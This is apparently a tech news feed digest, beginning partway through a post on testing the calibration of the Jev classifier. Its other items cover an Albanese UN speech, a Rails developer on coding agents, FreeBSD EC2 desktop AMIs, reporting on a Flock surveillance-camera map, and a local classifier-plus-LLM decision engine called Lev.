The ERP integration story is also attractive. A model that returns {"is_exception": 0.93} in 100 ms can sit inside a request path. An LLM that returns a paragraph in four seconds has to sit beside it in a queue. That difference decides whether ML is a feature or a batch job.

The claims I am not ready to accept yet Link to section: The claims I am not ready to accept yet

A few things in the launch material deserve a skeptical reading.

“Zero hallucination.” What TypeSafe can guarantee is that the output type is always valid: you asked for one of five categories, you get one of five categories, with probabilities that sum to one. That is real and useful, and LLM structured-output modes only approximate it. But it says nothing about whether the chosen category is right . A confidently wrong answer in a valid schema is still a wrong answer. The honest framing is “zero schema errors,” and calibration is what has to cover the rest.

Calibration on whose distribution? A model can be well calibrated on its training and benchmark distribution and drift badly on yours. Calibration is a property of a model and a dataset. The only number I will trust is one measured on my data.

The comparison baseline. “200x faster than an LLM on classification” is true and also a bit unfair, because the right baseline for many of these tasks is not an LLM. It is a gradient-boosted tree on engineered features, which is also sub-millisecond and free. The interesting comparison is three-way: classical tabular model, LLM-as-classifier, and Jev, on the same task, on accuracy, ranking, calibration, latency and cost.

The experiment I want to run Link to section: The experiment I want to run

I have exactly the right testbed already built: the PR acceptance pipeline from my paper. It is leakage-aware, it has fixed 5-fold splits, and it has a published tree-model baseline with a known calibration weakness. Here is the design.

Task. Same as RQ1 in the paper: given a PR at submission time, predict merged vs. closed without merge. The Jev state will be the PR title, body, and the same submission-time metadata and diff statistics the trees see, serialized as text. Nothing that appears after submission (comments, CI, later commits) goes into the state. The leakage rules do not relax because the model is new.

Questions. One noul : “This pull request will be merged.” Optionally one choice over the task-intent tags (fix, feature, refactor, docs) to see whether Jev’s own reading of intent agrees with our keyword rules.

Baselines. The paper’s Random Forest (400 trees), the same forest with isotonic calibration fitted in-fold, and a frontier LLM asked the same question with structured output.

Metrics. Ranking and calibration, not just F1:

  • ROC-AUC, so the result is comparable to the paper.
  • Brier score , the mean squared error of the probability against the outcome:

Brier = 1 N ∑ i = 1 N ( p ^ i − y i ) 2 \text{Brier} = \frac{1}{N}\sum_{i=1}^{N}\left(\hat{p}_i - y_i\right)^2

  • Expected calibration error , binning predictions by confidence and measuring how far each bin’s accuracy is from its stated confidence:

ECE = ∑ b = 1 B ∣ S b ∣ N ∣ acc ( S b ) − conf ( S b ) ∣ \text{ECE} = \sum_{b=1}^{B} \frac{|S_b|}{N}\,\Big|\,\text{acc}(S_b) - \text{conf}(S_b)\,\Big|

  • A reliability diagram per model, because a single ECE number hides where a model is over- or under-confident.
  • Median and p95 latency, and cost per 1,000 PRs.

What would change my mind. If Jev matches the forest’s AUC and beats the calibrated forest on Brier and ECE, without any post-hoc fitting, then the calibration claim is real on a distribution TypeSafe never saw, and I would start moving classification-shaped LLM calls at work onto it. If it beats the uncalibrated forest but not the calibrated one, then it is a convenience, not a capability. If its AUC is materially lower, the speed does not matter.

I will publish the numbers either way, and I will link them from here.

What I would tell a team today Link to section: What I would tell a team today

If you are deciding whether to care about Jev right now, my advice is:

  1. Inventory your LLM calls. Tag each one as generate or decide . The decide ones are candidates. In my experience that is most of them.
  2. Measure calibration on what you already have. Compute Brier and ECE for your current classifiers. If they are bad, you have a problem Jev might solve. If they are fine, you mostly have a latency and cost question.
  3. Do not skip the classical baseline. A gradient-boosted tree on decent features is the bar. Any new model has to beat it on your data, with your leakage rules, or it is not an upgrade.
  4. Treat “calibrated” as a hypothesis. Test it on your distribution before a business rule depends on it.

The idea behind System One models is sound: most of the decisions software needs from ML are small, structured, and latency-sensitive, and a chat model is a strange tool for them. Whether Jev delivers on the calibration promise is an empirical question. I have the dataset to answer it, and I intend to.

Further reading Link to section: Further reading

If you have Jev access and a labeled classification dataset with a known calibration problem, I would like to compare notes. My contact details are on the homepage.

  1. TypeSafe AI, Introducing System One Models & Jev , September 2026. Latency, speedup, pricing, cardinality and modality limits are quoted from that post and are the vendor’s claims. ↩ ↩ 2 ↩ 3

  2. LangChain, Building a harness with Jev , September 2026, which documents the state/questions request shape and the choice, score and noul question types. ↩

  3. K. Pansuriya, E. Ghorbani, D. Singh, E. A. AlOmar. Predicting Acceptance and Review Effort in Human and Agent Pull Requests. IEEE COMPSAC 2026. arXiv:2607.12057 . Table II reports RF F1 0.958 / AUC 0.676 and the majority baseline F1 0.957 / AUC 0.500. ↩

‘We can’t ignore AI or prevent it,’ Anthony Albanese tells UN general assembly – video

Guardian
www.theguardian.com
2026-09-24 22:15:20
During his speech to the UN in New York City, the Australian prime minister addresses the AI hack of Medicare, saying the episode reflects the need for greater regulation of artificial intelligence. ‘We can’t ignore AI or prevent it. And it’s why we joined with other nations this week to call for ac...
Original Article
‘We can’t ignore AI or prevent it,’ Anthony Albanese tells UN general assembly – video

During his speech to the UN in New York City, the Australian prime minister addresses the AI hack of Medicare, saying the episode reflects the need for greater regulation of artificial intelligence. ‘We can’t ignore AI or prevent it. And it’s why we joined with other nations this week to call for action to shape artificial intelligence development, rather than be passively shaped by it,’ he says. Albanese also used the speech as a pitch for Australia to join the UN security council

Northern Gannet, Great Blue Heron, California Brown Pelican

Simon Willison
simonwillison.net
2026-09-24 22:07:04
Northern Gannet, Great Blue Heron, California Brown Pelican, in Monterey Bay National Marine Sanctuary, CA, US, CA New 200-800mm Canon EF lens got me my best photo of Morris yet. They really like hanging out under that sign in the harbor! Tags: photography, wildlife...
Original Article

Sighting 7:07 PM – 7:27 PM — Northern Gannet, Great Blue Heron, California Brown Pelican, in Monterey Bay National Marine Sanctuary, CA, US, CA

Northern Gannet
Northern Gannet
Great Blue Heron
Great Blue Heron
California Brown Pelican
California Brown Pelican

New 200-800mm Canon EF lens got me my best photo of Morris yet. They really like hanging out under that sign in the harbor!

Pencils Down, Eyes Open: A Rails Developer After Rails World

Lobsters
caio.ca
2026-09-24 21:31:43
Comments...
Original Article

DHH’s Rails World keynote made me uncomfortable in a way I think is useful. I’ve spent more than a decade building Rails apps, and I’m not ready to treat the part of the job I love as an obsolete hobby.

But I don’t want that discomfort to become a business plan. I want to know what changed, what hasn’t, and what a developer like me can offer when agents do more of the typing.

More speed, more responsibility: an engineer scopes the work, reviews the result, and owns what ships.
The keyboard is one part of the job. Accountability runs through all of it.

What I took from the keynote

At 20:45 in the talk , DHH explains 37signals’ new “pencils down” policy: writing code by hand is now an exception to its normal workflow, not forbidden. If an agent can’t handle a task, the team can do it manually and improve the workflow afterward. That’s a radical choice for one company, not an instruction that every developer has to follow tomorrow.

The detail I can’t shake is his Basecamp 5 story . Designers brought in dozens of agent-generated pull requests that looked reasonable separately but left the architecture looking like “Swiss cheese” together. The team returned to more programmer-led work at the time; DHH now thinks better agents and better workflows are the way forward. He doesn’t show an agent-led repair of that particular problem. To me, the lesson is that a collection of plausible diffs is not the same thing as a coherent system.

And no, this wasn’t a eulogy for Rails. DHH describes an in-progress native-client and Rust-backend direction for HEY , then argues that the web still matters and Rails’ conventions help agents . I don’t need Ruby to win every use case to keep finding it useful for the work it’s good at.

Start with the pencils-down passage, or watch the full keynote on YouTube .

The part I resist

In May I wrote about what coding is starting to lose after a model helped me fix a background-job race condition in twelve minutes. The tests passed. I still missed the slow process of learning why the bug happened. That’s not just nostalgia if I’m the person who has to understand the next failure.

I’m happy to let an agent draft the tedious parts, suggest an approach, or explore an alternative I wouldn’t have had time to try. I don’t believe writing a small, tricky section myself when I need the mental model is a failure. Nor do I believe hand-typing boilerplate is a virtue. The useful question is: what will help me understand and safely maintain this particular system?

The big numbers deserve the same care. DHH’s 100-to-1,000-times comparison is a conjecture about the best aided programmer versus the worst unaided one, not a measured speedup for an average team. He argues that handwriting code is already uneconomical for most programmers and companies, and predicts virtually all domains will follow by the end of 2026 . That’s his economic bet, not a measured deadline on my career.

He cites nearly 95% success on an earlier, simpler Rails agent test . The harder feature-ticket slide in the keynote tops out at 35% at the effort shown. In a maximum-effort evaluation , the best model passed 53% of runs on that set of 20 tickets, at additional time and cost. That’s real progress, not a production reliability rate or a reason to skip review.

What I think happens to my career

Some work will need fewer developer hours. Companies may hire differently, and easier prototyping means more people can compete to build the same thing. DHH reaches for a bank-teller analogy to suggest automation can create new demand. I get the point, but his historical dates and counts don’t match the available reporting , and an analogy can’t forecast Rails hiring. It would be dishonest to promise that every existing role is safe. It would be just as dishonest to infer from a keynote that no one will need software engineers.

I’ve written Ruby for more than fifteen years and built Rails apps for over a decade. That experience isn’t a moat around typing Ruby. It helps me recognize where a simple change stops being simple. In my Sidekiq-to-Solid Queue migration guide , the adapter switch is easy to describe; draining old and scheduled jobs safely is the real work. An agent can help with the change, but a green diff alone doesn’t tell you what is still sitting in the old queue.

A three-step engineering loop: define the intent, prove the behavior, and own the rollout.
The work I want to be responsible for, whether I typed the code or not.

I want to turn vague requests into clear constraints, give agents bounded tasks, and spend the time they save on tests, data boundaries, security, deployment and rollback. Sometimes that means writing code myself. Always it means knowing what we asked for, what we got, and what customers will experience.

DHH also imagines apps with CLIs that users’ own agents can operate . That’s an interesting direction, and a practical question about who gets permission to do what.

A quick review exercise

Would you ship it?

Make the call before opening each answer. This is the work behind a green diff.

An agent swaps Sidekiq for Solid Queue. Tests pass. Shut off the old workers in the same deploy?

Not yet. First account for queued, scheduled and retrying jobs in Sidekiq; run both systems while new work moves over, watch the old queues drain, and plan for duplicates and rollback. A passing test suite can't tell you that Redis is empty.

A new app CLI lets an agent investigate a customer issue. Give it a production API key to move faster?

Not an unrestricted one. Start with scoped, auditable commands. Don't expose broad credentials to the agent's prompts, environment or tools; limit its network access and grant only what's needed. Test what untrusted customer data can make it do, and require a human decision for irreversible actions. A working tool is not automatically a safe one.

I can be a little resistant to the idea of putting my pencil down. I can also see the opportunity: Rails conventions, hard-won debugging instincts and a willingness to use new tools are a useful combination. The goal isn’t to defend every line I would have written. It’s to help a team ship software it can trust.

Launching FreeBSD/EC2 desktop AMIs

Lobsters
www.daemonology.net
2026-09-24 21:17:51
Comments...
Original Article
I'm excited to announce — oh don't worry, I'm not doing that again — a new feature for the FreeBSD/EC2 platform: Desktop AMIs.

Most people think of FreeBSD as being a server OS which is used only via the command line, but as anyone who has attended a BSD conference can attest, it works just fine with a GUI too. At BSDCan I saw many developers running FreeBSD on laptops from Framework, Lenovo, and Dell, and recognized KDE and Xfce desktop environments on many of them.

Desktop AMIs are designed to make it easier for new users to discover and start using FreeBSD. You can boot them in EC2, including as part of the AWS Free Tier , and connect to them using the same Remote Desktop Protocol used for connecting to Windows VMs. Indeed, I've carefully designed the AMIs to behave as much like Windows images as possible — with the exception, of course, that since they run FreeBSD, you don't have to pay for the operating system.

Let me show you how to get started.

I'm running FreeBSD already, so I use the AWS CLI from my FreeBSD command line, but Amazon says that the AWS CLI supports Linux, macOS, and Windows, so you should be able to follow along no matter which OS you're running. Since I live close to Vancouver, Canada, I'm using the ca-west-1 AWS region, but you can of course use whichever region is most convenient for you.

I start by creating an EC2 security group which allows access from my IP address to port TCP/3389

$ aws --region ca-west-1 ec2 create-security-group \
      --group-name "remote-desktop" \
      --description "Allows RDP Access"
$ aws --region ca-west-1 ec2 authorize-security-group-ingress \
      --group-name remote-desktop --protocol tcp --port 3389 \
      --cidr 1.2.3.4/32
and then create an SSH key pair — we're not going to use this key pair for SSH (although in fact the image we boot will have it enabled if we open that port in the security group) but instead it's used for encrypting a randomly-generated login password. Note that we need some non-default options to ssh-keygen : In order for the password encryption to work, we need an RSA key, and we need to store it in PEM format and with no passphrase. (If you don't have ssh-keygen on your OS, you can generate a key pair via the AWS Console.)
$ ssh-keygen -q -t rsa -f ec2_desktop_key -N "" -m PEM
$ aws --region ca-west-1 ec2 import-key-pair --key-name desktop \
      --public-key-material fileb://ec2_desktop_key.pub

Having created the security group and key pair, I look up the latest desktop AMI for FreeBSD 15.1-STABLE and launch an instance:

$ aws --region ca-west-1 ssm get-parameter \
      --name /aws/service/freebsd/amd64/desktop/ufs/15.1/STABLE \
      --query 'Parameter.Value' --output text
ami-0338948310e7f17c3
$ aws --region ca-west-1 ec2 run-instances \
      --query 'Instances[].InstanceId' --output text \
      --key-name desktop --security-groups remote-desktop \
      --instance-type m7i-flex.large --image-id ami-0338948310e7f17c3
i-0b683b23ff0e08515

FreeBSD will now boot, create the ec2-user account, and set a random password on it, which we can retrieve using the aws ec2 get-password-data command (aka the EC2 GetPasswordData API):

$ time aws --region ca-west-1 ec2 wait password-data-available \
      --instance-id i-0b683b23ff0e08515
        92.08 real        0.66 user         0.08 sys
$ aws --region ca-west-1 ec2 get-password-data \
      --query 'PasswordData' --output text \
      --priv-launch-key ec2_desktop_key --instance-id i-0b683b23ff0e08515
35zukC+t+:hqQZv3

Now we need to look up the IP address of the instance, and we should also get the host certificate fingerprint — this comes in two versions, an older SHA1 fingerprint and a newer SHA256 fingerprint. In general, tools running on UNIX will want the SHA256 fingerprint while Windows utilities use the SHA1 fingerprint. (If the second command doesn't print the fingerprint immediately, wait a few seconds and try again.)

$ aws --region ca-west-1 ec2 describe-instances \
      --query 'Reservations[].Instances[].PublicIpAddress' --output text \
      --instance-ids i-0b683b23ff0e08515
56.112.45.61
$ aws --region ca-west-1 ec2 get-console-output \
      --query 'Output' --output text --latest \
      --instance-id i-0b683b23ff0e08515 | grep THUMBPRINT
RDPCERTIFICATE-THUMBPRINT: 2B9840830741A21B4777FF59F69E1D0E5CDAC8D8
RDPCERTIFICATE-THUMBPRINT256: 3b:0f:1a:5d:ab:98:bc:1f:1d:fb:c8:4c:3b:11:7a:09:6b:70:0f:41:83:fe:f4:97:32:50:dd:41:7e:94:08:60

Since I'm running on FreeBSD, I use xfreerdp to connect to the instance; if you're running on macOS or Windows, you'll need to run the appropriate tools for your OS here. Whichever tool you're using, you'll need to specify the username ec2-user , the IP address (as seen above), and the password (as seen above — if running from a command line, you may need to quote it to avoid problems with shell metacharacters); and at some point you should either specify the host certificate fingerprint or check it when your client asks you to confirm that it is correct. For myself, using FreeBSD, I run

$ xfreerdp /u:ec2-user '/p:35zukC+t+:hqQZv3' /v:56.112.45.61 \
      /cert:fingerprint:sha256:3b:0f:1a:5d:ab:98:bc:1f:1d:fb:c8:4c:3b:11:7a:09:6b:70:0f:41:83:fe:f4:97:32:50:dd:41:7e:94:08:60
and after a few seconds of KDE session initialization I'm presented with a familiar GUI environment.

Once I'm done with the environment, I clean up, of course, terminating the EC2 instance and deleting the key pair and security group which I created. (If deleting the security group fails, try again after waiting a few seconds; you can't delete the security group until the instance using it is gone.)

$ aws --region ca-west-1 ec2 terminate-instances \
      --instance-ids i-0b683b23ff0e08515
$ aws --region ca-west-1 ec2 delete-key-pair --key-name desktop
$ aws --region ca-west-1 ec2 delete-security-group --group-name remote-desktop

Things to know

Let me share some important technical details that I think you'll find useful.

  • Desktop AMIs use KDE and also ship with Chromium and LibreOffice installed; you can, of course, install other software with the pkg tool, but I wanted to provide a useful starting point.
  • Desktop AMIs are not available for arm64 at this time; for reasons I don't fully understand, we don't have a Chromium package for arm64 .
  • Like all FreeBSD AMIs, these are published in both UFS-root and ZFS-root versions; you can usd ZFS-root if you prefer by changing ufs to zfs in the ssm get-parameter command above.
  • The AWS Console doesn't understand that these AMIs support RDP, so if you launch an instance via its "Launch an instance" wizard it will suggest creating a security group with port TCP/22 open rather than port TCP/3389; and the "Connect" wizard will show SSH instructions rather than the RDP instructions which are shown for Windows. I've asked Amazon to provide a mechanism for AMIs to be marked as RDP-enabled in order to turn on that missing functionality.
  • I expect these to be part of FreeBSD 15.2-RELEASE when that ships in December.

Pricing and availability

FreeBSD desktop AMIs, like all AMIs published by the FreeBSD Project, are free; you pay only the cost of the EC2 infrastructure. They're available in all the commercial AWS Regions except Middle East (Bahrain) and Middle East (UAE) due to ongoing availability issues in those two regions.

If you've been thinking of trying out FreeBSD, this is your cue: Go launch an instance!

blog comments powered by Disqus

That Time I Fought Draw And Won

Super Good Code
www.supergoodcode.com
2026-09-24 20:00:00
Tessellate Your Nightmares...
Original Article

Tessellate Your Nightmares

Way, way, way back in the day, there was EXT_shader_object , and inside Big Triangle there was a lot of debate about how things should work. By this time, I had long since infiltrated their organization. They viewed me as one of their own. Because of this, I was able to influence their sinister operation.

My plotting was even more underhanded than the Big Triangle fat-cats, and I nudged them to design tessellation shader objects in a manner which matched OpenGL. Specifically, all the spacing and vertex ordering mechanics were specified in the same shader stages as OpenGL. The D3D members of Big Triangle were asleep at the wheel. My influence went unopposed.

I was the butterfly flapping my wings to cause a hurricane.

That hurricane manifested years later. Suddenly, those sleeping giants awoke and discovered that shader objects were utterly incompatible with their chosen API. Their howls of rage reverberated across the world.

I was unprepared for the backlash. They wielded their monstrous power and upended everything. Suddenly, spacing and vertex ordering could be specified in any tessellation shader stage. It was a nightmare of epic proportions.

Draw Hell

Lavapipe, unbeknownst to many, is really just llvmpipe wearing a funny hat. This means it inherits all the llvmpipe-isms, including its deepest flaws. One flaw is that llvmpipe is primarily a driver for OpenGL rendering, and most of its internals are structured around that. Chief among them is the tessellation support, which goes through auxiliary/draw and then even deeper, into auxiliary/tessellator , a mysterious land where few have tread and even fewer have returned.

And all of this code expects tessellation parameters in the shader stages required by OpenGL.

This was fine due to my initial machinations, but it was no longer fine once the more fiendish parts of Big Triangle awoke. The tessellator was broken. Tests were failing. A new crisis had emerged.

Compatibility

Historically, this mismatch was handled by a function called merge_tess_info . It’s still present in a number of drivers. And it did work, propagating that info to the right place in lavapipe before being sent to llvmpipe, except for one wrinkle.

Dynamic domain origin.

OpenGL hardcodes this value to lower-left, but in Vulkan it can be either lower-left or upper-left. Lavapipe worked around this by treating upper-left as equivalent to toggling vertex ordering CCW: for the dynamic state, two versions of the shader were compiled, and lavapipe would run the one which corresponded to (shader_ccw ^ dynamic_domain_ccw) . This was fine since it was all restricted to the tessellation evaluation shader.

It was no longer fine once vertex ordering could also be specified in tessellation control.

Another Battle

I had two options: add even more hacks into lavapipe to work around this, or go spelunking deep into gallium to make all the weird bits support setting params in either shader stage. Naturally I went spelunking. This essentially meant shoving merge_tess_info into the depths of auxiliary/draw .

I won’t claim it was pretty or easy, but the battle was won. The forces of good have once again triumphed over the evils of Big Triangle’s tessellation monster.

Reproducible Builds (diffoscope): diffoscope 331 released

PlanetDebian
diffoscope.org
2026-09-24 20:00:00
The diffoscope maintainers are pleased to announce the release of diffoscope version 331. This version includes the following changes: [ Chris Lamb ] * Support radare2 >= 5.9.0. (Closes: reproducible-builds/diffoscope#432) * Update debian/tests/control. * Update copyright years. [ Christopher B...
Original Article

« Back to homepage

diffoscope 331 released

25 Sep 2026 — Chris Lamb

The diffoscope maintainers are pleased to announce the release of diffoscope version 331 . This version includes the following changes:

[ Chris Lamb ]
* Support radare2 >= 5.9.0. (Closes: reproducible-builds/diffoscope#432)
* Update debian/tests/control.
* Update copyright years.

[ Christopher Baines ]
* Add support for .nar files via Guix.

You find out more by visiting the project homepage .

« Back to homepage

Note on 24th September 2026

Simon Willison
simonwillison.net
2026-09-24 19:31:08
The more time I spend working with coding agents, the more convinced I am that they make software engineering even harder. We can do amazing things with them, but unlocking their full potential requires extraordinary discipline and knowledge. Tags: coding-agents, ai, llms...
Original Article

24th September 2026

The more time I spend working with coding agents, the more convinced I am that they make software engineering even harder.

We can do amazing things with them, but unlocking their full potential requires extraordinary discipline and knowledge.

Flock Wants The Most Detailed Map of Its Surveillance Cameras Taken Offline

Intercept
theintercept.com
2026-09-24 19:21:24
A security researcher’s map revealed more locations of Flock devices than any other. Flock is trying to take it down. The post Flock Wants The Most Detailed Map of Its Surveillance Cameras Taken Offline appeared first on The Intercept....
Original Article

Amid mounting concerns about its sprawling surveillance camera network, Flock Security told the press this summer that it operates more than 120,000 cameras nationwide.

But a new map published Wednesday by a cybersecurity researcher reveals Flock’s nationwide reach is even bigger. Based on location coordinates from Flock’s own database, the map shows more than 170,000 cameras, plus more than 130,000 accompanying gadgets that play a part in the company’s expansive American surveillance network.

Joshua Michael’s Flock Surveillance Map highlights the locations of what he says are 300,000 Flock surveillance devices spread across the country. His findings — which were cited in Wednesday’s Senate Subcommittee on Crime and Counterterrorism hearing on Flock — differ from existing maps of Flock’s automated license plate readers in scope and methodology.

“These cameras form a nationwide surveillance network that tracks where everyone drives.”

Unlike crowd-sourced projects such as DeFlock , which are built on locations submitted by users, the Flock Surveillance Map relies on location data culled from a snapshot, archived by Michael in December 2025, of Flock’s own records. In addition to cameras, it maps supplemental devices — including 27,000 acoustic detection devices, as well as networking equipment that integrates third-party cameras — to illustrate the scale of Flock’s surveillance web.

“These cameras form a nationwide surveillance network that tracks where everyone drives,” Michael told The Intercept, “so foreign nations don’t need to send spies to harm our country. They can simply watch where our soldiers, federal agents, and politicians go.”

The Intercept visited six random Arizona locations on Michael’s map; each location had a Flock camera present at the indicated coordinates.

The Flock Surveillance Map also color-codes each Flock device according to its model — showing, for instance, whether the device is a Flock camera, known as a Falcon, or an accompanying processing unit known as a Picard. (Flock did not immediately respond to a request for comment.)

The accompanying searchable dataset table also lists each camera’s individual name, as outlined in Flock’s database, which typically includes a street address and sometimes other identifying characteristics. A camera with the name “FBI Pilot Camera,” for example, is shown to be located at the J. Edgar Hoover Building — the FBI headquarters in Washington.

The map illustrates Flock’s national spread, but also its clustering in certain areas. For example, 860 Flock devices appear to be concentrated just outside Chicago O’Hare International Airport, at the Rosemont Public Safety Department, which provides police, fire, and emergency medical services in the Chicago suburb.

Numerous Flock cameras appear to be installed inside detention centers. A camera titled “C-F-23 FOXTROT MALE HOLDING 2/SHOWERS” appears at the coordinates of the Silverdale Detention Center in Chattanooga, Tennessee.

In November 2025 , Michael discovered a novel way to identify the location of Flock’s devices. Trawling the company’s website, he realized that Flock’s servers were publicly leaking data in the form of an access token that could be acquired without needing to log in. With that token, Michael said he could query ArcGIS, a third-party geographic information system platform used by Flock, to retrieve the locations of Flock devices.

Michael told The Intercept he promptly contacted Flock and described his findings. As Michael wrote in his initial email to Flock on November 13, 2025: “all testing was strictly non-intrusive, limited to open unauthenticated endpoints, and did not involve bypassing authentication, modifying data, or invoking any billable ArcGIS or Google operations.” Michael said he didn’t receive a reply, so he followed up with Flock the next day, and a third time several days later.

After his third attempt to inform Flock of the discovered vulnerability, Michael received a reply from a Flock that said, “Thank you for the findings. We are internally triaging them and will reach back out with next steps soon.”

Michael said he never heard back about it from Flock.

In December 2025, Michael downloaded the Flock device location data, and in January wrote an in-depth technical blogpost about his what he had found. After Michael’s post, it appears that Flock fixed the vulnerability.

Despite being alerted of Michael’s findings in November 2025, Flock published its own blogpost the following January saying it hadn’t had any data breaches. “Flock has never been hacked, and there has not been a leak of Flock information,” the company claimed. “Flock Safety’s cloud platform has never experienced a data breach.”

The Atlanta-based startup has faced mounting criticism for its practices and transparency in recent months. An American Civil Liberties Union report found “a pattern of Flock regularly misleading or even lying about its business practices, safety record, commitment to privacy, and efforts to protect vulnerable populations.”

Michael told The Intercept that Flock’s recent claims about its data security record don’t reflect reality. Flock has publicly claimed multiple times that the company has never experienced a data breach, “and this was after I pulled their database of devices.”

“That leaves two possibilities,” he said. “Either they knew and chose not to disclose it for fear of bad press, or they didn’t know I exfiltrated the data at all. The first is a transparency failure. The second is a detection failure with national security implications.”

On Thursday, Michael was notified that Doppel, which describes itself as an “AI-native social engineering defense platfom,” filed a trademark infringement complaint regarding his site, claiming to be working on Flock’s behalf. Doppel says that the site is using the trademark “FLOCK SAFETY” without authorization, which “may cause customer confusion / harm.” Doppel requested the site be taken down.

When he posted the Flock Surveillance Map, Michael included a pop-up disclaimer saying that the site is “not affiliated with or endorsed by Flock.”

Introducing Lev

Lobsters
yogthos.net
2026-09-24 19:11:11
Comments...
Original Article

A few weeks ago TypeSafe released Jev , and their demo of Jev playing Doom in real-time got a lot of excitement. Their argument is that chat models are great at conversation while still being awkward at doing real world tasks which often involve deciding things. Jev is a hosted classifier model which takes unstructured state as input and produces typed probabilistic decisions in a single pass. And what the Doom demo illustrates is that the model is able to do this reliably under a few hundred milliseconds. Since the responses are structured data, there is nothing that can be hallucinated, although the model can still misunderstand the question and produce a wrong classification. They call the category System One models, borrowing Kahneman's name for the fast automatic kind of thinking.

Naturally, people quickly pointed out that the idea behind Jev has been around for a while, and a whole slew of open source projects have popped up implementing the idea. I got curious to see how much work it would take to implement my own Jevlike using Jolt since I can use FFI to drive engines like llama.cpp easily enough.

I wanted to see how well an open weights model running on my own hardware would perform, and to experiment with having an escape hatch for the cases where a fast classifier fails to produce a high confidence answer. So, I proceeded to build Lev which is a decision engine exposing the same wire API as Jev.

This post explains how the classifier tier works, where these models fail, what the benchmarks say about actual Jev performance when people measure it independently, and how the escalation model in Lev addresses these shortcomings.

What a System One model actually does

An LLM reads input left to right and has to commit to each token before seeing what comes next. When you ask a chat model the same question, it generates an answer token by token, you parse the string, and if you want a confidence interval you have to ask for one in the prompt. Generation is the right tool for open-ended work, but it turns into an expensive detour when there is a known set of answers. Encoder models like ModernBERT are a better fit here because they read your entire input bidirectionally in one go. So, for a choice question, each option gets a marker token placed in the sequence next to the option's text. After the forward pass, a small head turns each marker's final representation into a score, and a softmax across the scores hands you a probability for every option simultaneously.

And that's the main part of the reason why these models are so fast. A 395M parameter encoder doing one pass over a few hundred tokens is cheap, and the cost grows only a little with the number of options it sees. These checkpoints were also trained with reinforcement learning on calibrated decisions, which means the probabilities are supposed to track how often the model is right in practice, so a 0.9 is meant to represent being right nine times out of ten. The confidence interval is the key to deciding how likely the result is to be correct, and we'll come back to it later since it carries a lot of weight in the design.

Where classifiers fall down

The failure modes for BERT style models appear to be consistent across every family I looked at. The first one is that classifiers interpolate but they aren't able to do deduction. They do great on traffic that looks like their training data, but if the question is a double negative or some other adversarial phrasing then they crumble. Lev's own adversarial set, 144 authored three-way decisions, was built to trip exactly this type of failure. The encoder tier models consistently score 61 to 67 percent on it. On the other hand, a local 2.5B LLM with thinking enabled scores 95 percent on the same set, because it runs a reasoning loop before answering. The downside is that running an LLM with reasoning on takes around 3 seconds using the GPU on my laptop, so it's not a drop in replacement for a classifier if you actually care about performance or efficiency.

Another failure is abstention, when you ask a classifier "is there enough information here to answer" it will almost always say yes, because the abstaining option rarely won during training. Lev's encoder picks the insufficient-evidence option 18 times where the data says it should pick it 36 times, and that's the exact same shape that shows up in Jev incidentally. An independent benchmark found it admits ignorance on 49.7 percent of forced-uncertainty items, where the LLMs tested admitted it 97 to 100 percent of the time.

There is also position bias to consider, where shuffling the order of the options and the answer sometimes changes. Around 13 percent of Jev's choices flip under permutation in one published measurement, and Lev's encoder also moves about 14 percent of its choices the same way. So, any system built on these models has to ensure that the option order the model sees as input is normalized.

Finally, there is the problem of overconfidence since the model can be sure of its output while being wrong. Softmax outputs are not honest odds, and their calibration being fitted on one distribution ends up drifting when the traffic looks different. The worst measured Jev calibration error in that same independent run was 0.246, and on the DAIR Emotion benchmark Jev scored 0.480 putting zero probability on the true label for 16 percent of examples.

None of this says the category is bad, it just means that the approach works best for a specific set of scenarios, and problems outside this set can be escalated to a different type of model. TypeSafe's own evals, for what it's worth, score Jev against the consensus of two frontier LLMs rather than against ground truth, so agreement with a big model is doing the work correctness would normally do. Independent measurements land Jev at 66 percent on a 150-passage test, tying Claude Haiku 4.5, and at 76.3 percent on a 77-way banking intent set against 81.3 for an open 120B model. So, the approach gives you respectable results at much lower cost while having honest-ish uncertainty. It's clearly a useful tool if you understand what types of problems to apply it to.

Route first, escalate second

The main innovation with Lev is that it routes between two very different kinds of model under the hood. First, a small classifier encoder is used that answers in about a tenth of a second on a laptop CPU, and when a low confidence answer is produced, the query is escalated to a local thinking LLM. The whole project compiles to a single standalone binary that runs entirely offline.

The fast tier is a set of encoder checkpoints from the convaiinnovations/laya release on the Hub, Apache-2.0 weights: an English ModernBERT-large, a typed-decisions variant with a longer context, and a multilingual one covering a hundred plus languages. A router looks at the request and picks an encoder by content and language unless you name the model explicitly. These run in one forward pass that covers every question in the call, roughly 95 milliseconds for a short question on my laptop's CPU.

The slow tier is any GGUF chat model loaded through a statically linked llama.cpp. It reads the state and scores its candidate answers by their token log probabilities, which is how you can pry honest numbers out of a generative model. Lev configures Qwen3.5-4B as its escalation model by default. Turns out that scoring allows skipping the thinking pass entirely, and still scores 95.1 percent on the adversarial 144-case set I mentioned earlier.

Now, if you'll recall, the LLM approach has a significant performance drawback running using stock llama.cpp, but it turns out that there is a brilliant parallel decision fork of llama.cpp which addresses the problem. Instead of forcing the model to spit out a JSON string token by token, which involves running a full forward pass per token, it frames the schema as a single token multiple choice problem. And the genius is the KV cache management because it processes base instructions and schema once on load, caching that state in VRAM. When a batch of questions comes in, all of them point to the same shared cache and just append a few tokens at the end for their specific field names. Since the heavy lifting of reading the context has already been done, the model only needs one forward pass to check the probability scores of your predefined choices. It ignores the rest of the vocabulary, evaluating every field in parallel to produce answers in milliseconds. Running the LLM still requires using the GPU, but in terms of raw speed it's now comparable to using the classifier.

Another part worth noting here is the confidence gate that Lev uses. On the adversarial set the encoder alone gets 61.1 percent at 117 milliseconds a case and using Qwen3.5-4B alone gives 95.1. Gating the encoder at a 0.5 confidence threshold leads to 126 of the 144 cases escalating, giving 92.4 percent at about 270 milliseconds a case. The gate errs conservatively on traffic that was designed to trip a classifier, and pretty much the whole set gets handed to the LLM, addressing the problem of the encoder being overconfident. But on a 120-case set of AG News, BoolQ, and SST-5 it answers every question in one forward pass at 65.8 percent accuracy and about 0.13 seconds per case, keeping most of its best task on the fast tier and escalating its worst. Across a mixed stream the encoder takes the easy majority while the thinker is reserved for the rest.

However, the gate does have a blind spot which is that a yes-or-no question's confidence is max of p and 1 minus p, meaning that it can never drop below 0.5, leading the encoder to be overconfident on that particular question shape. Every single BoolQ case stayed on the encoder at 72.5 percent accuracy, and even raising the noul threshold to 0.7 kept 37 of 40 cases on the fast tier. Because choice and score confidences are well behaved, the fix is to use per-type thresholds rather than a single number for everything.

